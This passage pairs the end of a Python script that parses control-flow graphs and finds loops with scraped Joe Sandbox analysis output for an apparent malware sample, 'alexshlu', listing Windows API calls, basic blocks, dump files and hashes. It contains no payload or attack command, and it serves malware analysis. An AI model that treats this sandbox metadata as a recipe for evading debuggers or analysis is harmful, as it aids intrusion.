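    "control_flow_graph 439 2bb97d-2bb9a7 440 2bb9a9-2bb9ab 439->440 441 2bb9ad-2bb9af 439->441 "
    "442 2bb9fe-2bba01 440->442 443 2bb9b1-2bb9b3 441->443 444 2bb9b5-2bb9bc call 2bb8b2 441->444 "
    "443->442 446 2bb9c1-2bb9c5 444->446 447 2bb9c7-2bb9d5 GetProcAddress 446->447 448 2bb9e4-2bb9fb "
    "446->448 447->448 450 2bb9d7-2bb9e2 call 2b132f 447->450 449 2bb9fd 448->449 449->442 450->449"
)
_ID = re.compile(r"^\d+$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")

def parse_cfg(text):
    """Return (blocks, edges); blocks maps id -> {start, end, apis, calls}."""
    toks = [t for t in text.split() if t != "control_flow_graph"]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok, nxt = toks[i], toks[i + 1] if i + 1 < len(toks) else ""
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif _ID.match(tok) and _ADDR.match(nxt):
            start, _, end = nxt.partition("-")
            cur = int(tok)
            blocks[cur] = {"start": int(start, 16), "end": int(end or start, 16), "apis": [], "calls": []}
            i += 1                                   # address token consumed
        elif tok == "call" and nxt:
            blocks[cur]["calls"].append(int(nxt, 16))
            i += 1                                   # call target consumed
        else:
            blocks[cur]["apis"].append(tok)          # e.g. GetStdHandle
        i += 1
    return blocks, edges

def _adjacency(edges, reverse=False):
    adj = defaultdict(list)
    for s, d in edges:
        adj[d if reverse else s].append(s if reverse else d)
    return adj

def back_edges(edges, entry):
    """(tail, header) edges that close a loop, found by DFS from the entry block."""
    succ, found, on_stack, done = _adjacency(edges), [], set(), set()
    def visit(b):
        on_stack.add(b)
        for d in succ[b]:
            if d in on_stack:
                found.append((b, d))
            elif d not in done:
                visit(d)
        on_stack.discard(b)
        done.add(b)
    visit(entry)
    return found

def natural_loop(edges, tail, header):
    """Header plus every block that reaches tail without passing through the header."""
    preds, body, work = _adjacency(edges, reverse=True), {header, tail}, [tail]
    while work:
        for p in preds[work.pop()]:
            if p not in body:
                body.add(p)
                work.append(p)
    return body

def summarise(text):
    """Entry/exit blocks, API and call sites, and natural loops of one exported graph."""
    blocks, edges = parse_cfg(text)
    has_pred, has_succ = {d for _, d in edges}, {s for s, _ in edges}
    entries = sorted(b for b in blocks if b not in has_pred)
    exits = sorted(b for b in blocks if b not in has_succ)
    loops = []
    for tail, header in (back_edges(edges, entries[0]) if entries else []):
        body = natural_loop(edges, tail, header)
        loops.append({"header": header, "tail": tail, "body": sorted(body),
                      "apis_in_loop": sorted(a for b in body for a in blocks[b]["apis"])})
    return {"blocks": len(blocks), "edges": len(edges), "entries": entries, "exits": exits,
            "apis": {a: b for b, blk in blocks.items() for a in blk["apis"]},
            "calls": {b: blk["calls"] for b, blk in blocks.items() if blk["calls"]},
            "loops": loops}

if __name__ == "__main__":
    for text in (CFG_TEXT, CFG_TEXT_GETPROC):
        print(summarise(text))
```

Running the script prints both summaries. For the function above it reports a single loop closed by the 321->314 edge whose body holds 18 of the 20 blocks, including the GetStdHandle block (320) and the GetFileType block (327), so both calls are made inside a loop rather than once; the GetProcAddress function has no loop, one exit block (442) and two subroutine calls, in blocks 444 and 450.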

Control-flow Graph
APIs
• GetLastError.KERNEL32(002D4C30,0000000C), ref: 002B3FA8
• ExitThread.KERNEL32 ref: 002B3FAF
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID:
• API String ID: 1611280651-0
• Opcode ID: b7797c760c4d9c9d7e9d4b6d66766e0c2dcec7b64b23f971f04a9f7d7aabdf50
• Instruction ID: b61bc23396c4c9fb270ec15bac6b84f1d8d2a95763acac5dd8b235d1e330c8a5
• Opcode Fuzzy Hash: b7797c760c4d9c9d7e9d4b6d66766e0c2dcec7b64b23f971f04a9f7d7aabdf50
• Instruction Fuzzy Hash: 54F08C71D20209AFDB01EF70E80AAAE7B74EF01380F20404AF40297691DB759E208FA1

Control-flow Graph
Basic blocks (id: address range [API or call target] -> successor ids):
• 352: 2aaf05-2aaf1f -> 353, 354
• 353: 2aaf28-2aaf30 -> 356, 357
• 354: 2aaf21-2aaf23 -> 355
• 355: 2ab001-2ab00e call 2a986f (no successors)
• 356: 2aaf32-2aaf3c -> 357, 364
• 357: 2aaf51-2aaf55 -> 360, 361
• 360: 2aaf5b-2aaf6c call 2ab795 -> 368, 369
• 361: 2aaffd -> 365
• 364: 2aaf3e-2aaf4f -> 366
• 365: 2ab000 -> 355
• 366: 2aafca-2aafcc -> 365
• 368: 2aaf6e-2aaf72 -> 370
• 369: 2aaf74-2aafa8 -> 375, 376
• 370: 2aafbb call 2aa866 -> 373
• 373: 2aafc0-2aafc7 -> 366
• 375: 2aafaa-2aafad -> 376, 377
• 376: 2aafce-2aafd6 -> 378, 379
• 377: 2aafaf-2aafb3 -> 361, 380
• 378: 2aafeb-2aaffb -> 365
• 379: 2aafd8-2aafe9 call 2b7f3a -> 361, 378
• 380: 2aafb5-2aafb8 -> 370
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1efe3fdbc52939c4402aec456f40eda415279a0af6585d48344c7cb4ee898ada
• Instruction ID: 75df6c87bd35263614370e4d4526b2e647a4a9d582f7e0c7a1d7869f0860189d
• Opcode Fuzzy Hash: 1efe3fdbc52939c4402aec456f40eda415279a0af6585d48344c7cb4ee898ada
• Instruction Fuzzy Hash: 8D31B87252411BAFCF15CF68C8448EDB7B8BF0A324B144226E512E3690DB31F954CB91

Control-flow Graph
Basic blocks (id: address range [API or call target] -> successor ids):
• 439: 2bb97d-2bb9a7 -> 440, 441
• 440: 2bb9a9-2bb9ab -> 442
• 441: 2bb9ad-2bb9af -> 443, 444
• 442: 2bb9fe-2bba01 (no successors)
• 443: 2bb9b1-2bb9b3 -> 442
• 444: 2bb9b5-2bb9bc call 2bb8b2 -> 446
• 446: 2bb9c1-2bb9c5 -> 447, 448
• 447: 2bb9c7-2bb9d5 GetProcAddress -> 448, 450
• 448: 2bb9e4-2bb9fb -> 449
• 449: 2bb9fd -> 442
• 450: 2bb9d7-2bb9e2 call 2b132f -> 449
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da8d88e6b47dcc0e88e3703f429506f7b96d23ac6333affbcf3e88fedb7d0ef6
• Instruction ID: bbacbb985c02ddd3a85488f619085ceb500ed8ba33925521eea23d0f272989a6
• Opcode Fuzzy Hash: da8d88e6b47dcc0e88e3703f429506f7b96d23ac6333affbcf3e88fedb7d0ef6
• Instruction Fuzzy Hash: 9B01F9336215155F9B138F69FC5999A33A5FBC57A03244125F61087154DB71AC208B90

Control-flow Graph

APIs
• __RTC_Initialize.LIBCMT ref: 002AE35D
  • Part of subcall function 002AE61A: InitializeSListHead.KERNEL32(002D8008,002AE382), ref: 002AE61F
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Initialize$HeadList
• String ID:
• API String ID: 394358367-0

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: CriticalLeaveSection
• String ID:
• API String ID: 3988221542-0
APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,002BAB70,00000001,00000364,?,00000005,000000FF,?,002B3FBA,002D4C30,0000000C), ref: 002BBC91
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,002BC8AA,?,?,002BC8AA,00000220,?,00000000,?), ref: 002BA903
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
  • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
• GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 002BFCDA
• IsValidCodePage.KERNEL32(00000000), ref: 002BFD18
• IsValidLocale.KERNEL32(?,00000001), ref: 002BFD2B
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002BFD73
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002BFD8E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID: l#-
• API String ID: 415426439-1174061122
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03D0
• GetLocaleInfoW.KERNEL32(?,20001004,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03F9
• GetACP.KERNEL32(?,?,002BFD08,?,00000000), ref: 002C040E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C0A09
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002AD87B
• IsDebuggerPresent.KERNEL32 ref: 002AD947
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002AD960
• UnhandledExceptionFilter.KERNEL32(?), ref: 002AD96A
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
                                                                                                                                                                                                                                        • Opcode ID: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction ID: 5f0b3a1e9a69a5f7047e60f8f04b8c188a856ac32efe59ad1d8df2830a850a23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 723108B5D1521D9BDF21EFA4D8897CDBBB8AF08700F1041AAE40DAB250EB749B85CF45
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$%$+$+
                                                                                                                                                                                                                                        • API String ID: 0-3555305375
                                                                                                                                                                                                                                        • Opcode ID: f0739bbda528c54f48d2546f26cb587137d74d9b97cb0acc8366c662c9fa0444
                                                                                                                                                                                                                                        • Instruction ID: 86854de3d3645dcbad7df9f171c004bae2561a0c7fac328d5ff322510c8f5fee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0739bbda528c54f48d2546f26cb587137d74d9b97cb0acc8366c662c9fa0444
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4322CB3052C7818FD315DF28C89476FBBE5AFCA344F148A1EE889872A1DB749994CB42
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$%$+$+
                                                                                                                                                                                                                                        • API String ID: 0-3555305375
                                                                                                                                                                                                                                        • Opcode ID: 112c39388b4d43a9031758abf10ad2e1ef431344e8dba56d9edf71baa468ea44
                                                                                                                                                                                                                                        • Instruction ID: 213b29ebbf5dbf99ddf13e399a3c014a218d992465f31c61d25c31c077e3ca69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 112c39388b4d43a9031758abf10ad2e1ef431344e8dba56d9edf71baa468ea44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D212BD305287818FD715EF28C09136FBBE5AFCA344F208A1EE9C5472A1DBB5D994CB42
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002BFF12
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002BFF5C
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C0022
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                                                                                        • Opcode ID: 068c5aefb0fe50afe00206cb7c2999ed3701eb809bb111a28ecf2560867cccc2
                                                                                                                                                                                                                                        • Instruction ID: 9c2bc2f06adead42ab99f77d9275f1f25d23e48bf84efc0b31158a56728fb7ce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 068c5aefb0fe50afe00206cb7c2999ed3701eb809bb111a28ecf2560867cccc2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5461AD71920217DFDB289F28DD82BBAB7A8EF04340F11817AE915D6681EB74DDA1CF50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002B6A55
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002B6A5F
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 002B6A6C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                        • Opcode ID: d46f37b5c7bc9c25dc3738300e388eb9cf44fc637bf73b60ccfbb2c084afe417
                                                                                                                                                                                                                                        • Instruction ID: 2b4c09c72040663a69836163edf59c6b9c2960c26dfcf98212bc3ae1f1391d73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d46f37b5c7bc9c25dc3738300e388eb9cf44fc637bf73b60ccfbb2c084afe417
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331C274911229ABCB21DF68D8897CDBBB8AF08750F5085EAE408A6250EB349F958F44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: _strlen
• String ID: Something
• API String ID: 4218353326-2334896984
• Opcode ID: d651f81b87be1771f0fa1cb38ad6f57b6c9428cddd1e74187be1e51be653dffa
• Instruction ID: af101a951de28acfa01add3db3048ee3a68cacb55df488b42801c9d70c8e7c4c
• Opcode Fuzzy Hash: d651f81b87be1771f0fa1cb38ad6f57b6c9428cddd1e74187be1e51be653dffa
• Instruction Fuzzy Hash: E2711771A283155FC318DF69C88462BF7D6AFCA310F054A2DED459B341EA30E961CBD1
APIs
• GetSystemTimePreciseAsFileTime.KERNEL32(?,002AE076,?,?,?,?,002AE09A,000000FF,00000000,?,?,002ADDB1,00000000,ios_base::badbit set), ref: 002AE1A8
• GetSystemTimeAsFileTime.KERNEL32(?,DAA4AEFB,00000000,?,002CAC4A,000000FF,?,002AE076,?,?,?,?,002AE09A,000000FF,00000000), ref: 002AE1AC
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Time$FileSystem$Precise
• String ID:
• API String ID: 743729956-0
• Opcode ID: 436d0d52c64fce079fce57ff72694444d839bbebcc16a93deb5e1c7aa74f7b2f
• Instruction ID: 81c003f1dfb9d80e1f1fb7318034d5dba96b2e702b8bddba6b038a62a75e08e5
• Opcode Fuzzy Hash: 436d0d52c64fce079fce57ff72694444d839bbebcc16a93deb5e1c7aa74f7b2f
• Instruction Fuzzy Hash: C7F06576D15568EFCB01CF44EC08B69B7A8FB09B20F11822BE81293790DF75AD008B95
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002C44E5,?,?,00000008,?,?,002CA97B,00000000), ref: 002C47B7
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: f38d3371e306bf23c019b02ae75106005e1e330e6bd30cb9c01a76e08ef7f17d
• Instruction ID: bbbd882fc70df162c03c5cd21e3548fb28e7bdf5a783f34b7a2ab7768d885a13
• Opcode Fuzzy Hash: f38d3371e306bf23c019b02ae75106005e1e330e6bd30cb9c01a76e08ef7f17d
• Instruction Fuzzy Hash: 02B149315206098FDB18DF28C49AB667BE0FF45364F25875CE999CF2A1C335E9A1CB40
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002AD4F1
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
